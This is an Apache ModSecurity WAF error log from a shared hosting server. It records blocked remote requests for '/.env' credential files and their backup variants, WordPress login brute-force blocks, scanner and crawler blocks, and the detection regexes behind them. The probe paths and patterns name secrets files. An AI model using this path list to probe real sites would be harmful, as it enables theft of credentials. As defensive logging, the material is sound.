[Tue May 26 13:07:00.485110 2026] [security2:error] [pid 485064:tid 485312] [client 176.65.139.233:20204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "agsnails.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVNnD9tlF55stOmSqEYOAAAAPs"]
[Tue May 26 13:07:00.508495 2026] [security2:error] [pid 485064:tid 485277] [client 20.104.227.76:4097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/rip.php"] [unique_id "ahVNnD9tlF55stOmSqEYPAAAANg"]
[Tue May 26 13:07:00.650520 2026] [security2:error] [pid 485064:tid 485249] [client 176.65.139.233:37508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jetstarprojects.com"] [uri "/.env"] [unique_id "ahVNnD9tlF55stOmSqEYQQAAALw"]
[Tue May 26 13:07:01.399310 2026] [security2:error] [pid 485064:tid 485304] [client 142.248.80.191:42670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env"] [unique_id "ahVNnT9tlF55stOmSqEYZAAAAPM"]
[Tue May 26 13:07:01.431441 2026] [security2:error] [pid 485064:tid 485229] [client 142.248.80.191:42704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/api/.env"] [unique_id "ahVNnT9tlF55stOmSqEYcQAAAKg"]
[Tue May 26 13:07:01.431562 2026] [security2:error] [pid 485064:tid 485204] [client 142.248.80.191:42720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/backend/.env"] [unique_id "ahVNnT9tlF55stOmSqEYcAAAAI8"]
[Tue May 26 13:07:01.431910 2026] [security2:error] [pid 485064:tid 485321] [client 142.248.80.191:42702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/app/.env"] [unique_id "ahVNnT9tlF55stOmSqEYdQAAAQQ"]
[Tue May 26 13:07:02.245664 2026] [security2:error] [pid 485064:tid 485231] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNnT9tlF55stOmSqEYjQAAAKo"]
[Tue May 26 13:07:02.477012 2026] [security2:error] [pid 485064:tid 485222] [client 85.208.96.203:45594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/9/"] [unique_id "ahVNnj9tlF55stOmSqEYqAAAAKE"]
[Tue May 26 13:07:02.477170 2026] [security2:error] [pid 485064:tid 485222] [client 85.208.96.203:45594] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/9/"] [unique_id "ahVNnj9tlF55stOmSqEYqAAAAKE"]
[Tue May 26 13:07:02.921111 2026] [security2:error] [pid 485064:tid 485131] [remote 185.227.134.44:40278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.134.227.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVNnj9tlF55stOmSqEYsQAAkUI"]
[Tue May 26 13:07:03.745249 2026] [security2:error] [pid 485064:tid 485228] [client 114.119.137.45:23893] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/2/"] [unique_id "ahVNnz9tlF55stOmSqEY2QAAAKc"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2024-02-18&eventDisplay=past
[Tue May 26 13:07:04.168508 2026] [security2:error] [pid 485064:tid 485229] [client 20.104.227.76:8309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/admin.php"] [unique_id "ahVNoD9tlF55stOmSqEY5wAAAKg"]
[Tue May 26 13:07:04.717900 2026] [security2:error] [pid 485064:tid 485244] [client 173.239.240.43:56625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVNoD9tlF55stOmSqEY-gAAALc"]
[Tue May 26 13:07:04.725083 2026] [security2:error] [pid 485064:tid 485214] [client 173.239.240.35:33997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVNoD9tlF55stOmSqEY_AAAAJk"]
[Tue May 26 13:07:04.727479 2026] [security2:error] [pid 485064:tid 485266] [client 173.239.240.38:21181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVNoD9tlF55stOmSqEY-wAAAM0"]
[Tue May 26 13:07:04.925769 2026] [security2:error] [pid 485064:tid 485249] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNoD9tlF55stOmSqEY-QAAALw"]
[Tue May 26 13:07:05.158169 2026] [security2:error] [pid 485064:tid 485282] [client 103.131.71.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVNnz9tlF55stOmSqEYzAAAAN0"]
[Tue May 26 13:07:05.180978 2026] [security2:error] [pid 485064:tid 485194] [client 142.248.80.191:42724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.copy"] [unique_id "ahVNoT9tlF55stOmSqEZEAAAAIU"]
[Tue May 26 13:07:05.659351 2026] [security2:error] [pid 485064:tid 485278] [client 142.248.80.191:44462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.swp"] [unique_id "ahVNoT9tlF55stOmSqEZJAAAANk"]
[Tue May 26 13:07:05.659474 2026] [security2:error] [pid 485064:tid 485264] [client 142.248.80.191:44474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.copy"] [unique_id "ahVNoT9tlF55stOmSqEZIgAAAMs"]
[Tue May 26 13:07:05.659908 2026] [security2:error] [pid 485064:tid 485229] [client 142.248.80.191:44468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.orig"] [unique_id "ahVNoT9tlF55stOmSqEZIwAAAKg"]
[Tue May 26 13:07:05.661818 2026] [security2:error] [pid 485064:tid 485251] [client 142.248.80.191:44458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env~"] [unique_id "ahVNoT9tlF55stOmSqEZJQAAAL4"]
[Tue May 26 13:07:05.662301 2026] [security2:error] [pid 485064:tid 485196] [client 142.248.80.191:44452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.backup"] [unique_id "ahVNoT9tlF55stOmSqEZKQAAAIc"]
[Tue May 26 13:07:05.662641 2026] [security2:error] [pid 485064:tid 485311] [client 142.248.80.191:44444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVNoT9tlF55stOmSqEZKgAAAPo"]
[Tue May 26 13:07:05.662925 2026] [security2:error] [pid 485064:tid 485261] [client 142.248.80.191:44446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.old"] [unique_id "ahVNoT9tlF55stOmSqEZKwAAAMg"]
[Tue May 26 13:07:05.664046 2026] [security2:error] [pid 485064:tid 485206] [client 142.248.80.191:44418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.bak"] [unique_id "ahVNoT9tlF55stOmSqEZKAAAAJE"]
[Tue May 26 13:07:05.698923 2026] [security2:error] [pid 485064:tid 485219] [client 142.248.80.191:44576] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.backup"] [unique_id "ahVNoT9tlF55stOmSqEZMgAAAJ4"]
[Tue May 26 13:07:05.698951 2026] [security2:error] [pid 485064:tid 485292] [client 142.248.80.191:44598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production~"] [unique_id "ahVNoT9tlF55stOmSqEZMQAAAOc"]
[Tue May 26 13:07:05.699712 2026] [security2:error] [pid 485064:tid 485309] [client 142.248.80.191:44610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.swp"] [unique_id "ahVNoT9tlF55stOmSqEZMwAAAPg"]
[Tue May 26 13:07:05.700001 2026] [security2:error] [pid 485064:tid 485294] [client 142.248.80.191:44626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.orig"] [unique_id "ahVNoT9tlF55stOmSqEZNQAAAOk"]
[Tue May 26 13:07:05.700824 2026] [security2:error] [pid 485064:tid 485262] [client 142.248.80.191:44570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.old"] [unique_id "ahVNoT9tlF55stOmSqEZNgAAAMk"]
[Tue May 26 13:07:05.702083 2026] [security2:error] [pid 485064:tid 485274] [client 142.248.80.191:44556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.copy"] [unique_id "ahVNoT9tlF55stOmSqEZNwAAANU"]
[Tue May 26 13:07:05.702319 2026] [security2:error] [pid 485064:tid 485319] [client 142.248.80.191:44554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.orig"] [unique_id "ahVNoT9tlF55stOmSqEZOAAAAQI"]
[Tue May 26 13:07:05.704499 2026] [security2:error] [pid 485064:tid 485303] [client 142.248.80.191:44538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.swp"] [unique_id "ahVNoT9tlF55stOmSqEZPAAAAPI"]
[Tue May 26 13:07:05.704611 2026] [security2:error] [pid 485064:tid 485295] [client 142.248.80.191:44522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local~"] [unique_id "ahVNoT9tlF55stOmSqEZPQAAAOo"]
[Tue May 26 13:07:05.704870 2026] [security2:error] [pid 485064:tid 485247] [client 142.248.80.191:44494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.old"] [unique_id "ahVNoT9tlF55stOmSqEZPgAAALo"]
[Tue May 26 13:07:05.705328 2026] [security2:error] [pid 485064:tid 485217] [client 142.248.80.191:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.production.bak"] [unique_id "ahVNoT9tlF55stOmSqEZOQAAAJw"]
[Tue May 26 13:07:05.705511 2026] [security2:error] [pid 485064:tid 485230] [client 142.248.80.191:44498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.nationspioneer.taotechservices.com"] [uri "/.env.local.backup"] [unique_id "ahVNoT9tlF55stOmSqEZQAAAAKk"]
[Tue May 26 13:07:06.020987 2026] [security2:error] [pid 485064:tid 485244] [client 40.77.167.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVNoT9tlF55stOmSqEZQwAAALc"]
[Tue May 26 13:07:06.748872 2026] [security2:error] [pid 485064:tid 485312] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNoj9tlF55stOmSqEZXgAAAPs"]
[Tue May 26 13:07:08.613310 2026] [security2:error] [pid 485064:tid 485286] [client 176.65.139.236:52554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rakeshdewan.com"] [uri "/.env"] [unique_id "ahVNpD9tlF55stOmSqEZsQAAAOE"]
[Tue May 26 13:07:08.730700 2026] [security2:error] [pid 485064:tid 485262] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNpD9tlF55stOmSqEZoQAAAMk"]
[Tue May 26 13:07:08.765232 2026] [security2:error] [pid 485064:tid 485197] [client 176.65.139.231:63124] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rakeshdewan.moes-art.com"] [uri "/.env"] [unique_id "ahVNpD9tlF55stOmSqEZuAAAAIg"]
[Tue May 26 13:07:09.769748 2026] [security2:error] [pid 485064:tid 485316] [client 176.65.139.232:61716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "stvica.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ6gAAAP8"]
[Tue May 26 13:07:09.770409 2026] [security2:error] [pid 485064:tid 485270] [client 176.65.139.232:61732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "koneksi.com.co"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ6wAAANE"]
[Tue May 26 13:07:09.775729 2026] [security2:error] [pid 485064:tid 485218] [client 176.65.139.236:52570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "consola.co"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ7AAAAJ0"]
[Tue May 26 13:07:09.779414 2026] [security2:error] [pid 485064:tid 485282] [client 176.65.139.237:49276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "jhonparra.com"] [uri "/.env"] [unique_id "ahVNpT9tlF55stOmSqEZ7QAAAN0"]
